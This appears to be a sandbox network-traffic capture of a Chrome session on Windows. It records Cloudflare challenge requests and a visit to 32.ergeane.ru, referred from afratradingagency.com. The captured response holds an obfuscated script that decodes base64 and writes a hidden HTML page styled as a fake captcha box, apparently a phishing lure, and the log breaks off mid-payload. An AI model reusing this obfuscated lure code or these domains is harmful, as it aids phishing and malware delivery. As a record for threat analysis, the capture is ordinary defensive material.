                                                                                                                                                                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                  CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  CF-Challenge: sCDrsV9LIaSFpes0IKITElad6ICUbYIMVUygOsJtH.I-1734550068-1.1.1.1-QtOUJfLZCQbLtTQ18ode0.v6uncVl07WirXxFCCvRnoBWYkvA.1m7PAgDI5j43Qu
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4r65z/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:28:09 UTC16384OUTData Raw: 76 5f 38 66 34 31 38 64 36 38 39 61 64 64 33 32 63 61 3d 6c 6e 78 68 65 35 2d 77 4c 37 6e 2d 4c 5a 77 2d 59 38 72 38 6a 5a 34 38 65 31 2d 46 38 6d 58 68 78 41 68 38 43 38 51 68 48 56 78 38 58 4e 38 50 68 6c 78 38 4a 78 38 6c 35 38 4d 31 47 6b 58 35 34 61 34 38 34 42 38 41 57 4b 47 68 38 47 68 2d 39 38 4e 68 34 39 38 70 41 70 6d 4a 47 38 37 49 2d 67 38 59 49 2d 39 70 39 38 6b 47 38 6b 2d 56 51 6e 38 35 61 39 6c 49 38 50 2d 36 6f 67 38 42 54 74 6d 44 4c 78 47 24 38 6b 67 78 5a 35 78 38 51 38 4d 39 38 5a 6d 38 73 35 49 2d 73 38 78 35 4f 38 35 77 38 62 70 65 41 77 4e 58 47 25 32 62 48 47 4f 4a 4e 35 6d 61 78 53 46 38 37 39 6e 68 4d 7a 70 5a 6b 68 31 38 38 62 66 78 31 34 6e 31 6d 38 50 2d 57 4c 4f 69 78 66 35 61 6a 4e 38 71 4a 63 67 61 4a 51 37 66 79 72 42 4c
                                                                                                                                                                                                                                  Data Ascii: v_8f418d689add32ca=lnxhe5-wL7n-LZw-Y8r8jZ48e1-F8mXhxAh8C8QhHVx8XN8Phlx8Jx8l58M1GkX54a484B8AWKGh8Gh-98Nh498pApmJG87I-g8YI-9p98kG8k-VQn85a9lI8P-6og8BTtmDLxG$8kgxZ5x8Q8M98Zm8s5I-s8x5O85w8bpeAwNXG%2bHGOJN5maxSF879nhMzpZkh188bfx14n1m8P-WLOixf5ajN8qJcgaJQ7fyrBL
                                                                                                                                                                                                                                  2024-12-18 19:28:09 UTC16384OUTData Raw: 77 4e 76 54 7a 48 41 34 54 2d 57 6e 77 6d 75 75 66 58 31 35 38 68 63 47 36 78 38 4e 78 38 38 35 2b 48 35 69 68 35 42 6d 33 47 2d 6e 35 4a 38 67 4c 4d 71 6b 39 38 43 6e 2d 42 68 39 38 78 68 78 38 4d 38 2d 76 4c 5a 38 35 6d 38 58 38 4e 68 6b 64 38 78 38 69 4e 2d 78 38 2b 38 78 4d 35 4a 38 6d 77 5a 49 35 6e 38 6c 38 78 4d 35 74 68 73 38 48 64 4e 42 38 45 38 31 68 35 58 38 64 52 6b 78 38 4e 38 33 68 4e 4c 38 77 38 37 68 6b 4c 38 48 68 37 34 37 47 35 59 38 24 68 4d 47 38 77 38 4e 24 69 68 2d 78 4e 67 61 4d 38 34 79 38 7a 58 61 68 6b 39 7a 53 69 55 6d 34 58 38 48 51 6b 7a 2d 6e 49 57 38 67 62 63 58 2d 78 38 39 6d 2d 6d 38 4d 4c 5a 49 2d 49 38 78 68 67 47 50 6d 4c 55 38 48 6e 6b 4a 6d 39 77 6b 4a 78 42 38 67 4c 38 45 44 63 2d 39 7a 6c 78 4d 4d 38 4a 38 34 6e 38
                                                                                                                                                                                                                                  Data Ascii: wNvTzHA4T-WnwmuufX158hcG6x8Nx885+H5ih5Bm3G-n5J8gLMqk98Cn-Bh98xhx8M8-vLZ85m8X8Nhkd8x8iN-x8+8xM5J8mwZI5n8l8xM5ths8HdNB8E81h5X8dRkx8N83hNL8w87hkL8Hh747G5Y8$hMG8w8N$ih-xNgaM84y8zXahk9zSiUm4X8HQkz-nIW8gbcX-x89m-m8MLZI-I8xhgGPmLU8HnkJm9wkJxB8gL8EDc-9zlxMM8J84n8
                                                                                                                                                                                                                                  2024-12-18 19:28:09 UTC1013OUTData Raw: 68 2d 41 49 62 6e 30 46 53 46 68 35 46 69 4a 62 77 51 53 55 38 36 65 69 78 36 67 35 56 38 76 78 38 69 79 37 7a 56 49 6b 33 6b 6e 38 6e 38 62 47 34 52 38 24 6d 35 44 55 61 41 42 64 51 4c 2d 78 2d 53 67 35 6c 6c 51 68 55 4c 59 66 5a 47 38 35 49 2d 68 37 57 2d 46 68 6b 52 70 59 38 6f 49 4b 51 6e 2d 2b 49 74 4c 4d 6e 54 2b 47 74 54 4d 66 4f 2b 39 74 79 59 52 76 6e 5a 68 37 76 4b 52 38 51 68 6c 47 5a 31 2d 66 38 48 47 6b 54 2d 37 47 43 5a 77 59 50 58 4b 4a 78 2d 6e 76 34 78 70 46 50 63 5a 63 4c 2b 34 34 66 62 4c 69 77 69 36 35 2b 34 69 70 30 75 63 2b 30 55 30 72 51 57 37 45 68 73 68 35 70 55 71 57 4c 44 35 4b 38 4a 38 69 49 38 62 62 36 6f 4e 44 68 75 56 68 76 51 7a 58 4a 42 44 39 48 75 62 54 70 75 24 35 55 72 68 6d 44 68 30 52 69 44 62 47 4c 24 54 49 4a 65 68
                                                                                                                                                                                                                                  Data Ascii: h-AIbn0FSFh5FiJbwQSU86eix6g5V8vx8iy7zVIk3kn8n8bG4R8$m5DUaABdQL-x-Sg5llQhULYfZG85I-h7W-FhkRpY8oIKQn-+ItLMnT+GtTMfO+9tyYRvnZh7vKR8QhlGZ1-f8HGkT-7GCZwYPXKJx-nv4xpFPcZcL+44fbLiwi65+4ip0uc+0U0rQW7Ehsh5pUqWLD5K8J8iI8bb6oNDhuVhvQzXJBD9HubTpu$5UrhmDh0RiDbGL$TIJeh
                                                                                                                                                                                                                                  2024-12-18 19:28:09 UTC286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:28:09 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Content-Length: 4544
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  cf-chl-out: L0lTfNB5ErgWum7b4SZpOb8car8Ayhgwzk3tj3Ss2bSRfy89cSzrLJOLFQJc1qhPTJ5Gqz6T8XxjZyJotkogep8z340TUNUmU6Y6V5xSCoEUWQQmJzJg6zw=$zW4b65AbkR+Yy9M2
                                                                                                                                                                                                                                  2024-12-18 19:28:09 UTC1259INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 62 6f 4e 38 70 71 2b 6d 78 42 30 39 78 36 64 6b 30 6f 4e 6d 53 58 31 43 59 7a 4a 2f 51 48 65 6e 35 61 59 6b 57 4d 4e 4b 65 6e 70 32 71 4d 53 6b 39 6a 46 2b 6e 31 57 50 6a 32 4a 4e 59 56 30 2f 66 70 55 48 7a 73 42 33 74 35 45 45 46 74 79 66 35 76 72 70 75 68 55 48 37 6f 73 73 6d 4f 6a 74 61 37 79 49 35 41 6f 62 71 46 49 43 73 32 30 59 55 64 35 61 78 37 75 62 69 7a 59 4b 59 2b 30 46 56 53 73 4a 69 47 4c 4d 76 58 49 52 51 45 44 38 61 54 64 54 75 53 30 4a 4b 51 52 4e 30 51 6b 2b 57 6d 73 46 43 6f 30 30 45 47 45 46 64 6f 53 45 78 55 61 6f 2f 79 6e 67 5a 4c 39 46 31 41 72 59 6c 47 34 33 4f 4a 68 39 72 4a 36 76 58 51 4e 7a 6e 61 4a 4e 59 4a 43 2f 6c 43 33 2f 42 65 57 58 69 65 6c 56 53 70 55 6b 31 2b 68 7a 63 30 68 7a 39
                                                                                                                                                                                                                                  Data Ascii: cf-chl-out-s: boN8pq+mxB09x6dk0oNmSX1CYzJ/QHen5aYkWMNKenp2qMSk9jF+n1WPj2JNYV0/fpUHzsB3t5EEFtyf5vrpuhUH7ossmOjta7yI5AobqFICs20YUd5ax7ubizYKY+0FVSsJiGLMvXIRQED8aTdTuS0JKQRN0Qk+WmsFCo00EGEFdoSExUao/yngZL9F1ArYlG43OJh9rJ6vXQNznaJNYJC/lC3/BeWXielVSpUk1+hzc0hz9
                                                                                                                                                                                                                                  2024-12-18 19:28:09 UTC1193INData Raw: 62 56 53 48 5a 48 5a 56 68 47 32 50 57 6e 35 33 6a 5a 57 50 6c 6e 42 6a 70 47 57 71 66 71 6d 42 72 57 31 6e 69 47 69 41 69 58 32 43 75 48 53 49 6a 37 65 5a 6e 48 36 63 75 34 2b 62 73 72 71 79 6e 37 61 2b 6f 70 65 6e 72 4b 75 67 71 59 69 2b 77 38 2b 71 6c 63 6e 50 79 4d 7a 52 30 37 61 36 33 72 47 2f 31 75 48 6a 33 36 44 46 78 63 6e 5a 30 37 6e 57 36 73 72 47 78 75 4c 77 37 4c 4c 42 39 4c 58 4b 73 4c 71 37 37 37 76 50 74 76 62 41 33 64 32 37 42 4e 76 53 42 38 4c 6c 31 38 54 44 79 51 62 6b 2f 65 62 76 7a 78 62 72 38 52 6a 6c 37 67 33 74 35 66 63 53 2b 76 41 62 32 69 41 47 47 50 62 61 2f 52 72 6c 35 51 59 45 45 65 67 64 4c 50 4d 53 4e 77 63 34 42 66 67 52 46 68 48 36 43 44 77 32 4c 52 64 46 4a 54 34 77 4b 41 51 32 4e 44 73 61 43 79 78 46 49 45 6f 63 44 51 64
                                                                                                                                                                                                                                  Data Ascii: bVSHZHZVhG2PWn53jZWPlnBjpGWqfqmBrW1niGiAiX2CuHSIj7eZnH6cu4+bsrqyn7a+openrKugqYi+w8+qlcnPyMzR07a63rG/1uHj36DFxcnZ07nW6srGxuLw7LLB9LXKsLq777vPtvbA3d27BNvSB8Ll18TDyQbk/ebvzxbr8Rjl7g3t5fcS+vAb2iAGGPba/Rrl5QYEEegdLPMSNwc4BfgRFhH6CDw2LRdFJT4wKAQ2NDsaCyxFIEocDQd
                                                                                                                                                                                                                                  2024-12-18 19:28:09 UTC1369INData Raw: 66 48 54 42 75 6f 59 35 39 54 2b 44 74 2f 35 41 79 54 63 2b 77 63 55 35 64 7a 71 41 2b 51 77 47 54 4c 36 49 65 30 30 36 2f 34 78 45 2f 45 70 39 53 6a 39 51 43 6f 57 2f 43 2f 35 51 41 45 64 51 53 49 46 50 42 73 39 42 55 30 62 4f 52 73 70 55 67 38 68 56 53 4d 7a 45 52 73 6f 48 52 59 30 4d 44 59 65 4f 52 6f 64 4c 6a 30 33 51 30 46 47 50 32 4d 6c 57 30 4e 4e 4c 46 39 6c 59 44 5a 30 52 33 42 44 4d 56 4e 75 55 6d 70 55 55 56 65 41 62 6c 5a 45 65 48 4a 61 58 6f 6c 59 5a 45 74 38 62 4a 42 62 6a 30 39 6e 58 70 52 73 57 46 52 79 65 47 68 63 5a 31 61 63 59 70 42 74 64 57 61 69 6f 57 68 30 63 35 6d 4a 64 33 71 4d 61 48 71 49 62 71 39 73 6a 48 64 34 63 70 47 75 6a 48 75 55 64 34 79 4c 67 34 4f 55 68 6f 2b 47 75 6f 57 42 70 34 4f 58 6a 36 53 61 6b 59 58 46 79 61 76 59
                                                                                                                                                                                                                                  Data Ascii: fHTBuoY59T+Dt/5AyTc+wcU5dzqA+QwGTL6Ie006/4xE/Ep9Sj9QCoW/C/5QAEdQSIFPBs9BU0bORspUg8hVSMzERsoHRY0MDYeORodLj03Q0FGP2MlW0NNLF9lYDZ0R3BDMVNuUmpUUVeAblZEeHJaXolYZEt8bJBbj09nXpRsWFRyeGhcZ1acYpBtdWaioWh0c5mJd3qMaHqIbq9sjHd4cpGujHuUd4yLg4OUho+GuoWBp4OXj6SakYXFyavY
                                                                                                                                                                                                                                  2024-12-18 19:28:09 UTC1369INData Raw: 72 52 45 41 44 37 48 64 33 62 46 2f 63 41 43 2b 63 57 2f 75 6b 69 47 51 55 41 41 69 38 49 4a 69 59 78 38 75 38 75 46 68 51 55 4f 43 6f 75 2b 77 45 56 42 42 45 32 49 44 4d 65 53 44 6b 33 4f 6b 35 43 44 69 63 75 4e 53 6b 74 4d 68 63 52 4d 43 64 57 48 42 34 71 56 6d 41 34 4c 6b 41 64 50 54 4a 53 47 30 46 43 4b 7a 34 70 52 7a 6c 52 4d 46 4e 54 51 6a 4e 4a 51 48 4d 35 52 32 64 61 53 44 74 58 55 34 42 74 59 6e 75 43 63 56 4a 31 69 46 39 47 59 34 39 69 53 58 2b 54 63 46 31 4e 53 48 47 48 6c 6e 42 30 57 35 74 7a 6e 71 42 66 58 70 43 64 58 6d 5a 76 6e 57 46 67 63 32 5a 73 68 57 61 69 6f 59 70 2f 6e 36 2b 41 61 61 53 69 70 70 75 6e 65 62 4f 67 73 49 33 42 66 58 78 33 78 5a 6e 49 66 38 61 4b 68 62 72 48 72 73 79 64 7a 34 36 75 6b 4e 4b 57 71 36 37 4f 71 73 7a 50 31
                                                                                                                                                                                                                                  Data Ascii: rREAD7Hd3bF/cAC+cW/ukiGQUAAi8IJiYx8u8uFhQUOCou+wEVBBE2IDMeSDk3Ok5CDicuNSktMhcRMCdWHB4qVmA4LkAdPTJSG0FCKz4pRzlRMFNTQjNJQHM5R2daSDtXU4BtYnuCcVJ1iF9GY49iSX+TcF1NSHGHlnB0W5tznqBfXpCdXmZvnWFgc2ZshWaioYp/n6+AaaSippunebOgsI3BfXx3xZnIf8aKhbrHrsydz46ukNKWq67OqszP1
                                                                                                                                                                                                                                  2024-12-18 19:28:09 UTC613INData Raw: 53 2b 4f 51 55 48 42 58 31 46 79 49 5a 48 44 41 6d 45 76 41 72 4c 66 44 30 46 44 6f 4e 50 52 45 2f 2f 51 6f 69 51 7a 30 50 45 6a 78 42 45 78 74 44 48 45 78 4a 53 41 74 42 48 45 63 6d 52 53 42 4f 54 69 34 50 55 42 55 56 55 31 4a 49 4c 53 46 57 53 32 4d 67 58 30 59 67 5a 32 6f 70 4f 30 4a 6c 4c 6d 78 73 62 44 4a 43 58 57 78 4b 65 55 39 78 54 33 68 72 66 33 6c 61 50 34 41 2f 57 6e 35 79 66 33 69 46 67 6f 4e 49 53 6f 4b 49 58 31 2b 4b 59 6c 36 4a 6a 70 42 6d 53 34 39 73 56 5a 47 64 63 35 64 54 6e 6e 61 63 66 70 68 35 6b 4a 79 55 66 71 56 39 70 71 61 6a 62 4c 4a 78 69 33 32 6a 69 48 47 6d 75 37 4b 38 62 37 75 65 63 70 43 32 72 62 43 31 76 34 61 42 79 4c 2b 61 76 34 50 4b 78 73 6a 53 76 36 58 45 73 4d 69 55 71 74 62 45 71 74 6a 47 31 71 2f 4c 6c 38 2f 59 72 37
                                                                                                                                                                                                                                  Data Ascii: S+OQUHBX1FyIZHDAmEvArLfD0FDoNPRE//QoiQz0PEjxBExtDHExJSAtBHEcmRSBOTi4PUBUVU1JILSFWS2MgX0YgZ2opO0JlLmxsbDJCXWxKeU9xT3hrf3laP4A/Wn5yf3iFgoNISoKIX1+KYl6JjpBmS49sVZGdc5dTnnacfph5kJyUfqV9pqajbLJxi32jiHGmu7K8b7uecpC2rbC1v4aByL+av4PKxsjSv6XEsMiUqtbEqtjG1q/Ll8/Yr7


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  20192.168.2.1649730104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:28:10 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/2086485229:1734549043:TPqdoFXSqnBTzlfdVp_C1hOSpTqfObAmvJDumlRiigI/8f418d689add32ca/sCDrsV9LIaSFpes0IKITElad6ICUbYIMVUygOsJtH.I-1734550068-1.1.1.1-QtOUJfLZCQbLtTQ18ode0.v6uncVl07WirXxFCCvRnoBWYkvA.1m7PAgDI5j43Qu HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:28:11 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:28:11 GMT
                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                  Content-Length: 7
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                  cf-chl-out: HM/882zN0fx7jMdftnW3VaCVPigSZXmbVuo=$m0crXMMGMyq5Lbqa
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418df5ae748c89-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:28:11 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                  Data Ascii: invalid


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  21192.168.2.1649733104.21.32.2254436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:28:12 UTC720OUTGET /yNriUGk0/ HTTP/1.1
                                                                                                                                                                                                                                  Host: 32.ergeane.ru
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                                                                                                                  Referer: https://52kz793.afratradingagency.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:28:13 UTC1256INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:28:13 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Cache-Control: no-cache, private
                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M7QPlI2mmTOOZBmhJHdVtmR%2B6nRQ%2BA%2BVl5UjEOue5ApDeQ0JxFpP5D%2BS17tQeO2OIs6JvnFkMFfqtiI5U7QfNIPFeJ56GKshw2Tovr19HFDou8c1ZGQrpYoaBg3GeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1306&rtt_var=98&sent=1100&recv=304&lost=0&retrans=0&sent_bytes=1300380&recv_bytes=48739&delivery_rate=53683791&cwnd=335&unsent_bytes=0&cid=901b9ac1cfb4cdef&ts=598384&x=0"
                                                                                                                                                                                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6IlBSMUtzOTd4YWc3MHFGeG5HTlR2SVE9PSIsInZhbHVlIjoiOVpNUFJhRkh0c2R2WDFvR2RnM3JIdEM5Z3BhY3ExYjB1eGtQSTFkZHZGNzZXM1h3NVY5SWFFSUxtY3Vlc1M2OUpzZGY1L3hPdzhmOWVBaFJhVWtBdXBkYzY4ZkdTM0pkMU9RR3dFY2FvZFI5ZWJSZjcreUo5Wld4ZkluTlF3dDYiLCJtYWMiOiI1NjFkM2M1NzA5YWI4ZmRlNDAyODE3ZDZkYzhhYzI0OTMzZTRhMjMzOTE1NmJkZGVhNDgwYzExYzIxYTBkZDZmIiwidGFnIjoiIn0%3D; expires=Wed, 18-Dec-2024 21:28:13 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                                                                                                                  2024-12-18 19:28:13 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 78 51 53 46 4e 52 63 7a 46 78 5a 6e 55 78 4f 56 52 43 4d 45 46 6e 61 54 41 7a 65 58 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 53 6c 4e 49 57 45 56 4f 4d 55 6c 35 4c 32 39 46 4d 47 55 33 53 54 56 53 64 7a 6c 51 4e 32 46 42 4b 31 45 30 4e 57 59 30 63 33 51 32 64 56 63 76 4d 7a 46 76 62 6e 5a 77 54 47 31 6c 61 69 73 7a 53 30 35 54 56 6e 52 79 62 7a 42 4e 4e 53 74 53 4d 32 4a 75 56 6e 64 58 52 54 59 77 53 6d 30 77 53 57 64 53 5a 56 68 4a 54 46 70 31 53 6c 6b 35 65 6a 68 31 61 44 52 4f 5a 54 56 53 4e 44 4a 79 55 6e 6c 70 63 6b 73 77 4e 57 46 75 57 6e 46 5a 4e 6c 6c 68 61 6e 64 6e 4f 47 74 31 51 55 52 7a 5a 57 39 4d 51 79 73 33 59 30 55
                                                                                                                                                                                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImxQSFNRczFxZnUxOVRCMEFnaTAzeXc9PSIsInZhbHVlIjoiSlNIWEVOMUl5L29FMGU3STVSdzlQN2FBK1E0NWY0c3Q2dVcvMzFvbnZwTG1laiszS05TVnRybzBNNStSM2JuVndXRTYwSm0wSWdSZVhJTFp1Slk5ejh1aDROZTVSNDJyUnlpckswNWFuWnFZNllhandnOGt1QURzZW9MQys3Y0U
                                                                                                                                                                                                                                  2024-12-18 19:28:13 UTC1369INData Raw: 37 66 66 32 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 38 7a 4d 69 35 6c 63 6d 64 6c 59 57 35 6c 4c 6e 4a 31 4c 33 6c 4f 63 6d 6c 56 52 32 73 77 4c 77 3d 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e 46 31 5a 58
                                                                                                                                                                                                                                  Data Ascii: 7ff2<script>if(atob("aHR0cHM6Ly8zMi5lcmdlYW5lLnJ1L3lOcmlVR2swLw==") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZX
                                                                                                                                                                                                                                  2024-12-18 19:28:13 UTC1369INData Raw: 63 6a 73 4e 43 69 41 67 49 43 42 68 62 47 6c 6e 62 69 31 70 64 47 56 74 63 7a 6f 67 59 32 56 75 64 47 56 79 4f 77 30 4b 49 43 41 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 41 77 4a 54 73 4e 43 69 41 67 49 43 42 6a 62 32 78 76 63 6a 6f 67 64 32 68 70 64 47 55 37 44 51 6f 67 49 43 41 67 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 69 41 79 4e 48 42 34 4f 77 30 4b 49 43 41 67 49 48 52 6c 65 48 51 74 59 57 78 70 5a 32 34 36 49 47 4e 6c 62 6e 52 6c 63 6a 73 4e 43 6e 30 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 57 4a 76 65 43 42 37 44 51 6f 67 49 43 41 67 5a 47 6c 7a 63 47 78 68 65 54 6f 67 5a 6d 78 6c 65 44 73 4e 43 69 41 67 49 43 42 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4f 69 41 6a 4d 44 41 77 4d 44 41 77 4f 47 45 37 44 51 6f 67 49 43 41 67 5a 6d 78 6c 65 43 31
                                                                                                                                                                                                                                  Data Ascii: cjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIGhlaWdodDogMTAwJTsNCiAgICBjb2xvcjogd2hpdGU7DQogICAgZm9udC1zaXplOiAyNHB4Ow0KICAgIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCi5jYXB0Y2hhLWJveCB7DQogICAgZGlzcGxheTogZmxleDsNCiAgICBiYWNrZ3JvdW5kOiAjMDAwMDAwOGE7DQogICAgZmxleC1
                                                                                                                                                                                                                                  2024-12-18 19:28:13 UTC1369INData Raw: 6d 4e 68 63 48 52 6a 61 47 45 74 59 32 68 6c 59 32 74 74 59 58 4a 72 4f 6a 70 68 5a 6e 52 6c 63 69 42 37 44 51 6f 67 49 43 41 67 59 32 39 75 64 47 56 75 64 44 6f 67 49 69 49 37 44 51 6f 67 49 43 41 67 63 47 39 7a 61 58 52 70 62 32 34 36 49 47 46 69 63 32 39 73 64 58 52 6c 4f 77 30 4b 49 43 41 67 49 47 78 6c 5a 6e 51 36 49 44 56 77 65 44 73 4e 43 69 41 67 49 43 42 30 62 33 41 36 49 44 46 77 65 44 73 4e 43 69 41 67 49 43 42 33 61 57 52 30 61 44 6f 67 4e 6e 42 34 4f 77 30 4b 49 43 41 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 4a 77 65 44 73 4e 43 69 41 67 49 43 42 69 62 33 4a 6b 5a 58 49 36 49 48 4e 76 62 47 6c 6b 49 43 4d 30 59 32 46 6d 4e 54 41 37 44 51 6f 67 49 43 41 67 59 6d 39 79 5a 47 56 79 4c 58 64 70 5a 48 52 6f 4f 69 41 77 49 44 4e 77 65 43 41 7a
                                                                                                                                                                                                                                  Data Ascii: mNhcHRjaGEtY2hlY2ttYXJrOjphZnRlciB7DQogICAgY29udGVudDogIiI7DQogICAgcG9zaXRpb246IGFic29sdXRlOw0KICAgIGxlZnQ6IDVweDsNCiAgICB0b3A6IDFweDsNCiAgICB3aWR0aDogNnB4Ow0KICAgIGhlaWdodDogMTJweDsNCiAgICBib3JkZXI6IHNvbGlkICM0Y2FmNTA7DQogICAgYm9yZGVyLXdpZHRoOiAwIDNweCAz
